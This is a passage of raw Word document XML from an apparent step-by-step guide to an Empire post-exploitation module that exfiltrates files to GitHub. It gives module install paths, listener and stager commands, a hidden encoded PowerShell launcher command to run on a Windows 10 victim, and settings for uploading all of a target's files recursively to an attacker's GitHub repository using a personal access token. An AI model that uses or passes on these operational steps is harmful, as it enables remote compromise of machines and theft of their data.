      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00751E5F" w:rsidP="00A343C8">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00531ABE" w:rsidRPr="00C474E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/nnh100/exfil</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00A343C8">
      <w:r>
        <w:t>Put the Invoke_ExfilDataToGitHub.py script into the following location of the installation directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00397C3E" w:rsidP="00531ABE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00397C3E">
        <w:t>Empire/lib/modules/powershell/exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007328CB" w:rsidRDefault="007328CB" w:rsidP="00A343C8"/>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00A343C8">
      <w:r>
        <w:t>Put the Invoke-ExfilDataToGitHub.ps1 script into the following location:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00531ABE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00531ABE">
        <w:t>Empire/data/module_source/exfil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00A343C8"/>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8">
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00A343C8"/>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="006443E8" w:rsidP="009C6690">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc464374239"/>
      <w:r>
        <w:t>Empire Configuration and Exploitation Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00317484" w:rsidRDefault="00317484" w:rsidP="009C6690">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc464374240"/>
      <w:r>
        <w:t>Create a Listener</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="00A343C8">
      <w:r>
        <w:t>Start Empire with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="006443E8" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006443E8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>./empire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="00A343C8"/>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="00A343C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5728970" cy="3553460"/>
            <wp:effectExtent l="0" t="0" r="5080" b="889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55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3E8" w:rsidRDefault="006443E8" w:rsidP="00A343C8"/>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="006443E8" w:rsidP="00A343C8">
      <w:r>
        <w:t>Create a listener called kali</w:t>
      </w:r>
      <w:r w:rsidR="00FB5307">
        <w:t xml:space="preserve"> (this will listen for incoming connections)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set Name kali </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB5307" w:rsidRDefault="00FB5307" w:rsidP="006443E8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006443E8" w:rsidRDefault="006443E8" w:rsidP="006443E8"/>
    <w:p w:rsidR="006443E8" w:rsidRDefault="000F1DE0" w:rsidP="006443E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26337FA3" wp14:editId="20B4542D">
            <wp:extent cx="5722620" cy="35814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909" w:rsidRDefault="00971909" w:rsidP="00A343C8"/>
    <w:p w:rsidR="001C3706" w:rsidRDefault="001C3706" w:rsidP="009C6690">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc464374241"/>
      <w:r>
        <w:t>Create a Stager</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="001C3706" w:rsidP="00A343C8">
      <w:r>
        <w:t xml:space="preserve">The stager is code that will run on the victim machine and connect back to the attacker machine (this can be PowerShell code, a VBA macro, USB Ducky script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3706" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc464374242"/>
      <w:r>
        <w:t>PowerShell launcher</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRPr="00971909" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:r>
        <w:t>Issue the following commands to create a PowerShell launcher:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>usestager launcher</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">info </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>set Listener kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRDefault="00971909" w:rsidP="00971909">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0AF5" w:rsidRDefault="00BE0AF5"/>
    <w:p w:rsidR="00971909" w:rsidRDefault="00971909">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1658AE54" wp14:editId="63249259">
            <wp:extent cx="5788999" cy="259772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976" cy="262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909" w:rsidRDefault="00971909"/>
    <w:p w:rsidR="000F1DE0" w:rsidRDefault="000F1DE0" w:rsidP="000F1DE0">
      <w:r>
        <w:t>Copy and run the generated PowerShell exploit code in a target (here I used Windows 10):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5C71" w:rsidRDefault="000F1DE0" w:rsidP="000F1DE0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00274DCD">
        <w:t>powershell.exe -NoP -sta -NonI -W Hidden -Enc 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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5C71" w:rsidRDefault="009A5C71" w:rsidP="009A5C71">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00971909" w:rsidRDefault="009A5C71" w:rsidP="009A5C71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665E157B" wp14:editId="426B0180">
            <wp:extent cx="5650339" cy="3068782"/>
            <wp:effectExtent l="0" t="0" r="762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603" t="10781"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5664073" cy="3076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5C71" w:rsidRDefault="009A5C71" w:rsidP="009A5C71">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA07E6" w:rsidRDefault="00FA07E6" w:rsidP="00FA07E6">
      <w:r>
        <w:t>List agents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA07E6" w:rsidRDefault="00FA07E6" w:rsidP="00FA07E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226CFA8C" wp14:editId="49D4A2F4">
            <wp:extent cx="5730240" cy="73152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8EC" w:rsidRDefault="004B08EC" w:rsidP="00FA07E6"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00FA07E6"/>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="00FA07E6"/>
    <w:p w:rsidR="00FA07E6" w:rsidRDefault="00FA07E6" w:rsidP="00FA07E6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Note you can rename and interact with the agent using the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031227A" w:rsidRDefault="00FA07E6" w:rsidP="00FA07E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7C3929" wp14:editId="21A9E7E3">
            <wp:extent cx="5721985" cy="21888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8EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43A85" w:rsidRDefault="00B43A85" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B08EC" w:rsidRDefault="004B08EC" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E03F93" w:rsidRDefault="00E03F93" w:rsidP="0031227A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00087FB6" w:rsidRDefault="00087FB6" w:rsidP="00087FB6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc464374243"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExfilDataToGitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00087FB6" w:rsidRDefault="00B023A9" w:rsidP="00B073BF">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate GitHub Personal Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00087FB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:t xml:space="preserve">To use this module you need to generate a GitHub Personal Access Token with the appropriate access rights and base 64 encode it before passing it in as the GHPAT option in Empire. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:t>Go to ‘Settings’ in your GitHub account and click on ‘Personal access tokens’ in the left hand pane as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE813FF" wp14:editId="58540377">
            <wp:extent cx="1874520" cy="4679634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48" cy="469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023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="001F7306" w:rsidRDefault="001F7306" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9"/>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Generate a new PAT selecting the ‘repo’ and ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>delete_repo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ scopes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A15C060" wp14:editId="1F81FC0B">
            <wp:extent cx="2907030" cy="3268980"/>
            <wp:effectExtent l="0" t="0" r="762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3A9" w:rsidRDefault="00B023A9" w:rsidP="00B023A9">
      <w:r>
        <w:t>Use any tool to base64 encode the generated PAT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B023A9" w:rsidRDefault="00B023A9" w:rsidP="00087FB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031227A" w:rsidRPr="00D573C3" w:rsidRDefault="00087FB6" w:rsidP="00D573C3">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc464374244"/>
      <w:r w:rsidRPr="00D573C3">
        <w:t>Select the Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D573C3">
        <w:t>ExfilDatatoGitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D573C3">
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00087FB6" w:rsidRDefault="00087FB6" w:rsidP="00087FB6">
      <w:r>
        <w:t>Issue the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00087FB6" w:rsidRDefault="00480D17" w:rsidP="00087FB6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00087FB6">
        <w:t>semodule exfiltration/Invoke_ExfilDataToGitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957E2A" w:rsidRDefault="00957E2A" w:rsidP="00087FB6"/>
    <w:p w:rsidR="00087FB6" w:rsidRPr="001F7306" w:rsidRDefault="00087FB6" w:rsidP="001F7306">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2594CF84" wp14:editId="58E9C61B">
            <wp:extent cx="4810991" cy="352806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797" cy="353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FB6" w:rsidRDefault="00957E2A" w:rsidP="00087FB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Set options with for example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957E2A" w:rsidRDefault="00957E2A" w:rsidP="00957E2A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>set Filter *.*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957E2A" w:rsidRDefault="00957E2A" w:rsidP="00957E2A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>set GHRepo exfil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957E2A" w:rsidRDefault="00957E2A" w:rsidP="00957E2A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>set GHUser nnh100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12564" w:rsidRDefault="00C12564" w:rsidP="00087FB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C96D20" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc464374245"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload all files recursively</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="670929B7" wp14:editId="659239EE">
            <wp:extent cx="4819048" cy="377952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866" cy="378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306" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:r>
        <w:t xml:space="preserve">Check your GitHub repo for the files that you uploaded. Note that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Recurse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should be either blank or True. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc464374246"/>
      <w:r>
        <w:t>Upload selected files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35BB4CA6" wp14:editId="6D783C37">
            <wp:extent cx="5728970" cy="269494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BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00D573C3">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc464374247"/>
      <w:r>
        <w:t>Upload file with data using PowerShell command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:r>
        <w:t xml:space="preserve">An example of sending data to a text file – note that the other options should be unset and to run a command issue it within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00533BBF">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$(dir c:\windows | out-string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412B404F" wp14:editId="334EEDEB">
            <wp:extent cx="5728970" cy="3740785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BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
